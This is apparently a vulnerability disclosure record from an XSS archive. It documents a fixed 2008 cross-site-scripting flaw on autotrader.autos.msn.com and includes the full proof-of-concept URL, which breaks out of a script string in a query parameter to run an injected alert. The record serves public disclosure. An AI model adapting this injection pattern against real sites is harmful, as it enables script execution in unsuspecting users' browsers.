Security researcher Thomas Pollet, has submitted on 20/04/2008 a cross-site-scripting (XSS) vulnerability affecting autotrader.autos.msn.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/06/2008. It is currently fixed.
Date submitted: 20/04/2008 Date published: 02/06/2008 Date fixed: 02/06/2008Status:  FIXED
Author: Thomas Pollet Domain: autotrader.autos.msn.com Category: XSS Pagerank: 5
URL: http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&mod
el=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC');%7D%7Dalert('n3td3v%20sucks');%
20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22
%3E/
Click here to view the mirror
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.